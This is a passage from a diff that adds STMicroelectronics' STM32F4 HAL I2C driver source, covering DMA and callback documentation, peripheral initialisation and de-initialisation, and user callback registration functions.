HAL_I2C_Slave_Receive_DMA() + (+) At reception end of transfer, HAL_I2C_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_SlaveRxCpltCallback() + (+) In case of transfer Error, HAL_I2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2C_ErrorCallback() + (+) Abort a master I2C process communication with Interrupt using HAL_I2C_Master_Abort_IT() + (+) End of abort process, HAL_I2C_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_AbortCpltCallback() + + *** DMA mode IO MEM operation *** + ================================= + [..] + (+) Write an amount of data in non-blocking mode with DMA to a specific memory address using + HAL_I2C_Mem_Write_DMA() + (+) At Memory end of write transfer, HAL_I2C_MemTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MemTxCpltCallback() + (+) Read an amount of data in non-blocking mode with DMA from a specific memory address using + HAL_I2C_Mem_Read_DMA() + (+) At Memory end of read transfer, HAL_I2C_MemRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MemRxCpltCallback() + (+) In case of transfer Error, HAL_I2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2C_ErrorCallback() + + + *** I2C HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in I2C HAL driver. + + (+) __HAL_I2C_ENABLE: Enable the I2C peripheral + (+) __HAL_I2C_DISABLE: Disable the I2C peripheral + (+) __HAL_I2C_GET_FLAG: Checks whether the specified I2C flag is set or not + (+) __HAL_I2C_CLEAR_FLAG: Clear the specified I2C pending flag + (+) __HAL_I2C_ENABLE_IT: Enable the specified I2C interrupt + (+) __HAL_I2C_DISABLE_IT: Disable the specified I2C interrupt + + *** Callback registration *** + ============================================= + [..] + The compilation flag USE_HAL_I2C_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_I2C_RegisterCallback() or HAL_I2C_RegisterAddrCallback() + to register an interrupt callback. + [..] + Function HAL_I2C_RegisterCallback() allows to register following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) MemTxCpltCallback : callback for Memory transmission end of transfer. + (+) MemRxCpltCallback : callback for Memory reception end of transfer. + (+) ErrorCallback : callback for error detection. + (+) AbortCpltCallback : callback for abort completion process. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + [..] + For specific callback AddrCallback use dedicated register callbacks : HAL_I2C_RegisterAddrCallback(). + [..] + Use function HAL_I2C_UnRegisterCallback to reset a callback to the default + weak function. + HAL_I2C_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) MemTxCpltCallback : callback for Memory transmission end of transfer. + (+) MemRxCpltCallback : callback for Memory reception end of transfer. + (+) ErrorCallback : callback for error detection. + (+) AbortCpltCallback : callback for abort completion process. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + [..] + For callback AddrCallback use dedicated register callbacks : HAL_I2C_UnRegisterAddrCallback(). + [..] + By default, after the HAL_I2C_Init() and when the state is HAL_I2C_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_I2C_MasterTxCpltCallback(), HAL_I2C_MasterRxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_I2C_Init()/ HAL_I2C_DeInit() only when + these callbacks are null (not registered beforehand). + If MspInit or MspDeInit are not null, the HAL_I2C_Init()/ HAL_I2C_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + [..] + Callbacks can be registered/unregistered in HAL_I2C_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_I2C_STATE_READY or HAL_I2C_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_I2C_RegisterCallback() before calling HAL_I2C_DeInit() + or HAL_I2C_Init() function. + [..] + When the compilation flag USE_HAL_I2C_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + + + [..] + (@) You can refer to the I2C HAL driver header file for more useful macros + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup I2C I2C + * @brief I2C HAL module driver + * @{ + */ + +#ifdef HAL_I2C_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup I2C_Private_Define + * @{ + */ +#define I2C_TIMEOUT_FLAG 35U /*!< Timeout 35 ms */ +#define I2C_TIMEOUT_BUSY_FLAG 25U /*!< Timeout 25 ms */ +#define I2C_TIMEOUT_STOP_FLAG 5U /*!< Timeout 5 ms */ +#define I2C_NO_OPTION_FRAME 0xFFFF0000U /*!< XferOptions default value */ + +/* Private define for @ref PreviousState usage */ +#define I2C_STATE_MSK ((uint32_t)((uint32_t)((uint32_t)HAL_I2C_STATE_BUSY_TX | (uint32_t)HAL_I2C_STATE_BUSY_RX) & (uint32_t)(~((uint32_t)HAL_I2C_STATE_READY)))) /*!< Mask State define, keep only RX and TX bits */ +#define I2C_STATE_NONE ((uint32_t)(HAL_I2C_MODE_NONE)) /*!< Default Value */ +#define I2C_STATE_MASTER_BUSY_TX ((uint32_t)(((uint32_t)HAL_I2C_STATE_BUSY_TX & I2C_STATE_MSK) | (uint32_t)HAL_I2C_MODE_MASTER)) /*!< Master Busy TX, combinaison of State LSB and Mode enum */ +#define I2C_STATE_MASTER_BUSY_RX ((uint32_t)(((uint32_t)HAL_I2C_STATE_BUSY_RX & I2C_STATE_MSK) | (uint32_t)HAL_I2C_MODE_MASTER)) /*!< Master Busy RX, combinaison of State LSB and Mode enum */ +#define I2C_STATE_SLAVE_BUSY_TX ((uint32_t)(((uint32_t)HAL_I2C_STATE_BUSY_TX & I2C_STATE_MSK) | (uint32_t)HAL_I2C_MODE_SLAVE)) /*!< Slave Busy TX, combinaison of State LSB and Mode enum */ +#define I2C_STATE_SLAVE_BUSY_RX ((uint32_t)(((uint32_t)HAL_I2C_STATE_BUSY_RX & I2C_STATE_MSK) | (uint32_t)HAL_I2C_MODE_SLAVE)) /*!< Slave Busy RX, combinaison of State LSB and Mode enum */ + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/** @defgroup I2C_Private_Functions I2C Private Functions + * @{ + */ +/* Private functions to handle DMA transfer */ +static void I2C_DMAXferCplt(DMA_HandleTypeDef *hdma); +static void I2C_DMAError(DMA_HandleTypeDef *hdma); +static void I2C_DMAAbort(DMA_HandleTypeDef *hdma); + +static void I2C_ITError(I2C_HandleTypeDef *hi2c); + +static HAL_StatusTypeDef I2C_MasterRequestWrite(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_MasterRequestRead(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_RequestMemoryWrite(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_RequestMemoryRead(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, uint32_t Tickstart); + +/* Private functions to handle flags during polling transfer */ +static HAL_StatusTypeDef I2C_WaitOnFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Flag, FlagStatus Status, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_WaitOnMasterAddressFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Flag, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_WaitOnTXEFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_WaitOnBTFFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_WaitOnRXNEFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_WaitOnSTOPFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef I2C_WaitOnSTOPRequestThroughIT(I2C_HandleTypeDef *hi2c); +static HAL_StatusTypeDef I2C_IsAcknowledgeFailed(I2C_HandleTypeDef *hi2c); + +/* Private functions for I2C transfer IRQ handler */ +static void I2C_MasterTransmit_TXE(I2C_HandleTypeDef *hi2c); +static void I2C_MasterTransmit_BTF(I2C_HandleTypeDef *hi2c); +static void I2C_MasterReceive_RXNE(I2C_HandleTypeDef *hi2c); +static void I2C_MasterReceive_BTF(I2C_HandleTypeDef *hi2c); +static void I2C_Master_SB(I2C_HandleTypeDef *hi2c); +static void I2C_Master_ADD10(I2C_HandleTypeDef *hi2c); +static void I2C_Master_ADDR(I2C_HandleTypeDef *hi2c); + +static void I2C_SlaveTransmit_TXE(I2C_HandleTypeDef *hi2c); +static void I2C_SlaveTransmit_BTF(I2C_HandleTypeDef *hi2c); +static void I2C_SlaveReceive_RXNE(I2C_HandleTypeDef *hi2c); +static void I2C_SlaveReceive_BTF(I2C_HandleTypeDef *hi2c); +static void I2C_Slave_ADDR(I2C_HandleTypeDef *hi2c, uint32_t IT2Flags); +static void I2C_Slave_STOPF(I2C_HandleTypeDef *hi2c); +static void I2C_Slave_AF(I2C_HandleTypeDef *hi2c); + +static void I2C_MemoryTransmit_TXE_BTF(I2C_HandleTypeDef *hi2c); + +/* Private function to Convert Specific options */ +static void I2C_ConvertOtherXferOptions(I2C_HandleTypeDef *hi2c); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup I2C_Exported_Functions I2C Exported Functions + * @{ + */ + +/** @defgroup I2C_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + deinitialize the I2Cx peripheral: + + (+) User must Implement HAL_I2C_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, DMA, IT and NVIC). + + (+) Call the function HAL_I2C_Init() to configure the selected device with + the selected configuration: + (++) Communication Speed + (++) Duty cycle + (++) Addressing mode + (++) Own Address 1 + (++) Dual Addressing mode + (++) Own Address 2 + (++) General call mode + (++) Nostretch mode + + (+) Call the function HAL_I2C_DeInit() to restore the default configuration + of the selected I2Cx peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the I2C according to the specified parameters + * in the I2C_InitTypeDef and initialize the associated handle. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Init(I2C_HandleTypeDef *hi2c) +{ + uint32_t freqrange; + uint32_t pclk1; + + /* Check the I2C handle allocation */ + if (hi2c == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_I2C_ALL_INSTANCE(hi2c->Instance)); + assert_param(IS_I2C_CLOCK_SPEED(hi2c->Init.ClockSpeed)); + assert_param(IS_I2C_DUTY_CYCLE(hi2c->Init.DutyCycle)); + assert_param(IS_I2C_OWN_ADDRESS1(hi2c->Init.OwnAddress1)); + assert_param(IS_I2C_ADDRESSING_MODE(hi2c->Init.AddressingMode)); + assert_param(IS_I2C_DUAL_ADDRESS(hi2c->Init.DualAddressMode)); + assert_param(IS_I2C_OWN_ADDRESS2(hi2c->Init.OwnAddress2)); + assert_param(IS_I2C_GENERAL_CALL(hi2c->Init.GeneralCallMode)); + assert_param(IS_I2C_NO_STRETCH(hi2c->Init.NoStretchMode)); + + if (hi2c->State == HAL_I2C_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hi2c->Lock = HAL_UNLOCKED; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + /* Init the I2C Callback settings */ + hi2c->MasterTxCpltCallback = HAL_I2C_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + hi2c->MasterRxCpltCallback = HAL_I2C_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + hi2c->SlaveTxCpltCallback = HAL_I2C_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + hi2c->SlaveRxCpltCallback = HAL_I2C_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + hi2c->ListenCpltCallback = HAL_I2C_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + hi2c->MemTxCpltCallback = HAL_I2C_MemTxCpltCallback; /* Legacy weak MemTxCpltCallback */ + hi2c->MemRxCpltCallback = HAL_I2C_MemRxCpltCallback; /* Legacy weak MemRxCpltCallback */ + hi2c->ErrorCallback = HAL_I2C_ErrorCallback; /* Legacy weak ErrorCallback */ + hi2c->AbortCpltCallback = HAL_I2C_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + hi2c->AddrCallback = HAL_I2C_AddrCallback; /* Legacy weak AddrCallback */ + + if (hi2c->MspInitCallback == NULL) + { + hi2c->MspInitCallback = HAL_I2C_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + hi2c->MspInitCallback(hi2c); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + HAL_I2C_MspInit(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + + hi2c->State = HAL_I2C_STATE_BUSY; + + /* Disable the selected I2C peripheral */ + __HAL_I2C_DISABLE(hi2c); + + /*Reset I2C*/ + hi2c->Instance->CR1 |= I2C_CR1_SWRST; + hi2c->Instance->CR1 &= ~I2C_CR1_SWRST; + + /* Get PCLK1 frequency */ + pclk1 = HAL_RCC_GetPCLK1Freq(); + + /* Check the minimum allowed PCLK1 frequency */ + if (I2C_MIN_PCLK_FREQ(pclk1, hi2c->Init.ClockSpeed) == 1U) + { + return HAL_ERROR; + } + + /* Calculate frequency range */ + freqrange = I2C_FREQRANGE(pclk1); + + /*---------------------------- I2Cx CR2 Configuration ----------------------*/ + /* Configure I2Cx: Frequency range */ + MODIFY_REG(hi2c->Instance->CR2, I2C_CR2_FREQ, freqrange); + + /*---------------------------- I2Cx TRISE Configuration --------------------*/ + /* Configure I2Cx: Rise Time */ + MODIFY_REG(hi2c->Instance->TRISE, I2C_TRISE_TRISE, I2C_RISE_TIME(freqrange, hi2c->Init.ClockSpeed)); + + /*---------------------------- I2Cx CCR Configuration ----------------------*/ + /* Configure I2Cx: Speed */ + MODIFY_REG(hi2c->Instance->CCR, (I2C_CCR_FS | I2C_CCR_DUTY | I2C_CCR_CCR), I2C_SPEED(pclk1, hi2c->Init.ClockSpeed, hi2c->Init.DutyCycle)); + + /*---------------------------- I2Cx CR1 Configuration ----------------------*/ + /* Configure I2Cx: Generalcall and NoStretch mode */ + MODIFY_REG(hi2c->Instance->CR1, (I2C_CR1_ENGC | I2C_CR1_NOSTRETCH), (hi2c->Init.GeneralCallMode | hi2c->Init.NoStretchMode)); + + /*---------------------------- I2Cx OAR1 Configuration ---------------------*/ + /* Configure I2Cx: Own Address1 and addressing mode */ + MODIFY_REG(hi2c->Instance->OAR1, (I2C_OAR1_ADDMODE | I2C_OAR1_ADD8_9 | I2C_OAR1_ADD1_7 | I2C_OAR1_ADD0), (hi2c->Init.AddressingMode | hi2c->Init.OwnAddress1)); + + /*---------------------------- I2Cx OAR2 Configuration ---------------------*/ + /* Configure I2Cx: Dual mode and Own Address2 */ + MODIFY_REG(hi2c->Instance->OAR2, (I2C_OAR2_ENDUAL | I2C_OAR2_ADD2), (hi2c->Init.DualAddressMode | hi2c->Init.OwnAddress2)); + + /* Enable the selected I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->Mode = HAL_I2C_MODE_NONE; + + return HAL_OK; +} + +/** + * @brief DeInitialize the I2C peripheral. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_DeInit(I2C_HandleTypeDef *hi2c) +{ + /* Check the I2C handle allocation */ + if (hi2c == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_I2C_ALL_INSTANCE(hi2c->Instance)); + + hi2c->State = HAL_I2C_STATE_BUSY; + + /* Disable the I2C Peripheral Clock */ + __HAL_I2C_DISABLE(hi2c); + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + if (hi2c->MspDeInitCallback == NULL) + { + hi2c->MspDeInitCallback = HAL_I2C_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + hi2c->MspDeInitCallback(hi2c); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_I2C_MspDeInit(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + hi2c->State = HAL_I2C_STATE_RESET; + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Release Lock */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; +} + +/** + * @brief Initialize the I2C MSP. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_MspInit(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the I2C MSP. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_MspDeInit(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User I2C Callback + * To be used instead of the weak predefined callback + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_I2C_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_I2C_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_I2C_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_I2C_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_I2C_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_I2C_MEM_TX_COMPLETE_CB_ID Memory Tx Transfer callback ID + * @arg @ref HAL_I2C_MEM_RX_COMPLETE_CB_ID Memory Rx Transfer completed callback ID + * @arg @ref HAL_I2C_ERROR_CB_ID Error callback ID + * @arg @ref HAL_I2C_ABORT_CB_ID Abort callback ID + * @arg @ref HAL_I2C_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_I2C_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_RegisterCallback(I2C_HandleTypeDef *hi2c, HAL_I2C_CallbackIDTypeDef CallbackID, pI2C_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hi2c); + + if (HAL_I2C_STATE_READY == hi2c->State) + { + switch (CallbackID) + { + case HAL_I2C_MASTER_TX_COMPLETE_CB_ID : + hi2c->MasterTxCpltCallback = pCallback; + break; + + case HAL_I2C_MASTER_RX_COMPLETE_CB_ID : + hi2c->MasterRxCpltCallback = pCallback; + break; + + case HAL_I2C_SLAVE_TX_COMPLETE_CB_ID : + hi2c->SlaveTxCpltCallback = pCallback; + break; + + case HAL_I2C_SLAVE_RX_COMPLETE_CB_ID : + hi2c->SlaveRxCpltCallback = pCallback; + break; + + case HAL_I2C_LISTEN_COMPLETE_CB_ID : + hi2c->ListenCpltCallback = pCallback; + break; + + case HAL_I2C_MEM_TX_COMPLETE_CB_ID : + hi2c->MemTxCpltCallback = pCallback; + break; + + case HAL_I2C_MEM_RX_COMPLETE_CB_ID : + hi2c->MemRxCpltCallback = pCallback; + break; + + case HAL_I2C_ERROR_CB_ID : + hi2c->ErrorCallback = pCallback; + break; + + case HAL_I2C_ABORT_CB_ID : + hi2c->AbortCpltCallback = pCallback; + break; + + case HAL_I2C_MSPINIT_CB_ID : + hi2c->MspInitCallback = pCallback; + break; + + case HAL_I2C_MSPDEINIT_CB_ID : + hi2c->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_I2C_STATE_RESET == hi2c->State) + { + switch (CallbackID) + { + case HAL_I2C_MSPINIT_CB_ID : + hi2c->MspInitCallback = pCallback; + break; + + case HAL_I2C_MSPDEINIT_CB_ID : + hi2c->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hi2c); + return status; +} + +/** + * @brief Unregister an I2C Callback + * I2C callback is redirected to the weak predefined callback + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * This parameter can be one of the following values: + * @arg @ref HAL_I2C_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_I2C_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_I2C_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_I2C_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_I2C_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_I2C_MEM_TX_COMPLETE_CB_ID Memory Tx Transfer callback ID + * @arg @ref HAL_I2C_MEM_RX_COMPLETE_CB_ID Memory Rx Transfer completed callback ID + * @arg @ref HAL_I2C_ERROR_CB_ID Error callback ID + * @arg @ref HAL_I2C_ABORT_CB_ID Abort callback ID + * @arg @ref HAL_I2C_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_I2C_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_UnRegisterCallback(I2C_HandleTypeDef *hi2c, HAL_I2C_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hi2c); + + if (HAL_I2C_STATE_READY == hi2c->State) + { + switch (CallbackID) + { + case HAL_I2C_MASTER_TX_COMPLETE_CB_ID : + hi2c->MasterTxCpltCallback = HAL_I2C_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + break; + + case HAL_I2C_MASTER_RX_COMPLETE_CB_ID : + hi2c->MasterRxCpltCallback = HAL_I2C_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + break; + + case HAL_I2C_SLAVE_TX_COMPLETE_CB_ID : + hi2c->SlaveTxCpltCallback = HAL_I2C_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + break; + + case HAL_I2C_SLAVE_RX_COMPLETE_CB_ID : + hi2c->SlaveRxCpltCallback = HAL_I2C_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + break; + + case HAL_I2C_LISTEN_COMPLETE_CB_ID : + hi2c->ListenCpltCallback = HAL_I2C_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + break; + + case HAL_I2C_MEM_TX_COMPLETE_CB_ID : + hi2c->MemTxCpltCallback = HAL_I2C_MemTxCpltCallback; /* Legacy weak MemTxCpltCallback */ + break; + + case HAL_I2C_MEM_RX_COMPLETE_CB_ID : + hi2c->MemRxCpltCallback = HAL_I2C_MemRxCpltCallback; /* Legacy weak MemRxCpltCallback */ + break; + + case HAL_I2C_ERROR_CB_ID : + hi2c->ErrorCallback = HAL_I2C_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_I2C_ABORT_CB_ID : + hi2c->AbortCpltCallback = HAL_I2C_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_I2C_MSPINIT_CB_ID : + hi2c->MspInitCallback = HAL_I2C_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_I2C_MSPDEINIT_CB_ID : + hi2c->MspDeInitCallback = HAL_I2C_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_I2C_STATE_RESET == hi2c->State) + { + switch (CallbackID) + { + case HAL_I2C_MSPINIT_CB_ID : + hi2c->MspInitCallback = HAL_I2C_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_I2C_MSPDEINIT_CB_ID : + hi2c->MspDeInitCallback = HAL_I2C_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hi2c); + return status; +} + +/** + * @brief Register the Slave Address Match I2C Callback + * To be used instead of the weak HAL_I2C_AddrCallback() predefined callback + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pCallback pointer to the Address Match Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_RegisterAddrCallback(I2C_HandleTypeDef *hi2c, pI2C_AddrCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hi2c); + + if (HAL_I2C_STATE_READY == hi2c->State) + { + hi2c->AddrCallback = pCallback; + } + else + { + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hi2c); + return status; +} + +/** + * @brief UnRegister the Slave Address Match I2C Callback + * Info Ready I2C Callback is redirected to the weak HAL_I2C_AddrCallback() predefined callback + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_UnRegisterAddrCallback(I2C_HandleTypeDef *hi2c) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hi2c); + + if (HAL_I2C_STATE_READY == hi2c->State) + { + hi2c->AddrCallback = HAL_I2C_AddrCallback; /* Legacy weak AddrCallback */ + } + else + { + /* Update the error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hi2c); + return status; +} + +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup I2C_Exported_Functions_Group2 Input and Output operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing 